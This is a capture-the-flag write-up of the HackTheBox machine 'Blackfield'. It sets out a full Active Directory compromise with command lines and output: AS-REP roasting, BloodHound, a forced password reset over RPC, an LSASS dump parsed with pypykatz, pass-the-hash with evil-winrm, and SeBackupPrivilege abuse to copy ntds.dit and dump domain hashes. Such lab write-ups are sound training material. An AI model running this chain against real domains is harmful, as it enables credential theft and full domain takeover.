Hackthebox - Blackfield

Summary

Blackfield,a Windows box created by HackTheBox user aas, It begin with finding list of folders which were username and kerbrosting the box to get a creds using which we can run bloodhound and we see that we can force change password for another uesr. by that we get access to forensic share downloading that we get lass.dmp which contain NTLM hashes and one of them worked for svc_backup account. with that we get on the box. checking groups we see we are member of SeBackupPrivilege using that we upload SeBackupPrivilegeUtils and take ntds.dit and download that and secretdump to get Administrator hash.

Initial Enumeration

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
# Nmap 7.80 scan initiated Sat Sep 12 13:44:29 2020 as: nmap -vv -sC -sV -Pn -oN nmap/blackfield 10.10.10.192
Nmap scan report for 10.10.10.192
Host is up, received user-set (0.074s latency).
Scanned at 2020-09-12 13:44:29 IST for 191s
Not shown: 993 filtered ports
Reason: 993 no-responses
PORT STATE SERVICE REASON VERSION
53/tcp open domain? syn-ack ttl 127
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2020-09-12 15:14:43Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=9/12%Time=5F5C8377%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h00m00s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 48702/tcp): CLEAN (Timeout)
| Check 2 (port 40786/tcp): CLEAN (Timeout)
| Check 3 (port 53840/udp): CLEAN (Timeout)
| Check 4 (port 53637/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-09-12T15:17:03
|_ start_date: N/A

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep 12 13:47:40 2020 -- 1 IP address (1 host up) scanned in 191.78 seconds

We see 445 open so lets check smb

SMB

1
2
3
4
5
6
7
8
9
10
11
smbclient -N -L \\\\10.10.10.192

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share

Checking SMB we see we have many share availiable

we see we can access profiles$ share so i got everything from that share but we only see Folders which seems like usernames.

So lets create a userlist from that.

RPC

We also see rpc open so lets look for anything from that using enum4linux which give us only ACCESS DENIED.

Not seeing any other thing. Lets try kerberoasting as we have usernames?

KerbRoasting

Looking at the nmap result we know the domain name as BLACKFIELD.local0

1
python GetNPUsers.py BLACKFIELD.local/ -usersfile users.lst -dc-ip 10.10.10.192 -no-pass -outputfile kerbrost.out

which found a kerbroastable user as support and get us one hash to crack

1
$krb5asrep$23$support@BLACKFIELD.LOCAL:6deb3b0f07267682cdbf82b9d72c14f0$74e4f73aba48624ba48e6e49cafd48b71abd7dbb92628b94b25b89b7fe2f251efc5260e2c195e54129f7cb9c82461f5d624ef25b5e6cec35da6eead72ff01ee861e85e95646728fbcacf76064f197f4f8f476a50e577e86fd107277fbb7087ec636cf1fc9132e71b62a6cf17aa771b0714b6b986073e2306a641d43e7722e4293a9df9e76cbef7af12216a5f59cca741c646afdfc6f6ba0fa7bac20958040dbf6bda075fed0342d95e6ff099ba677b91ae616d39ff0c684c1ca7db45ca8a44f0d5c8cb9077a2a2c2508d19b6a93d685aaa6640c9b1bf3f7e07b5644580770f460357684643bf7e9795a8dc2e148f0bf8629f9908

And we can crack this hash using hashcat as #00^BlackKnight

RPC again

Looking at smb we don’t see anything new with support user so i looked back at rpc

Bloodhound

I used bloodhound-python to dump

1
bloodhound-python -u support -p '#00^BlackKnight' --collectionmethod All -d blackfield.local -dc blackfield.local -gc blackfield.local -ns 10.10.10.192

and checking in bloodhound we see that support have ForceChangePassword on audit2020

Checking ForceChangePassword info we see

so using RPC we can change password for audit2020 using

1
rpcclient > setuserinfo2 audit2020 23 'P@ssw0rd'

Changing the password and smbclient to forensic we can dump the forensic share

Checking the dump we find lsass.zip so i used pypykatz to look at the dmp

1
2
$ unzip lsass.zip
$ pypykatz lsa minidump lsass.DMP

which give us the NT hash for svc_backup hash

Shell (SVC_BACKUP)

using the hash and winrm we can get a shell as svc_backups

1
evil-winrm -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.192

Privilege Escalation

Checking whoami /all we see we are member of

1
2
3
4
5
6
7
8
Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

the most interesting for me was SeBackupPrivilege as i can use this to copy files whose access i might not have.

The goal for me was to use diskshadow to create a shadow of C drive and use SeBackupPrivilegeUtils and SeBackupPrivilegeCmdLets to Copy-FileSeBackupPrivilege NTDS.dit and save system.hiv and use secretdump.py to extract hashes.

Create a diskshadow

1
2
3
4
set context persistent nowriters #
add volume c: alias someAlias #
create #
expose %someAlias% x: #

and save diskshadow.txt

1
diskshadow /s diskshadow.txt

and upload SeBackupPrivilegeUtils and SeBackupPrivilegeCmdLets module and

1
2
3
4
Import-module ./SeBackupPrivilegeUtils
Import-module ./SeBackupPrivilegeCmdLets
Copy-FileSeBackupPrivilege X:\windows\ntds\ntds.div C:\temp\ntds.div
reg.exe save hklm\system C:\temp\system.hiv

and using secretdump.py

1
secretsdump.py -ntds ./loot/ntds.dit -system ./loot/system.hiv local | tee hashes.txt

which gave the Administrator hash as 184fb5e5178480be64824d4cd53b99ee using which we can winrm on the box as Administrator

Related Posts: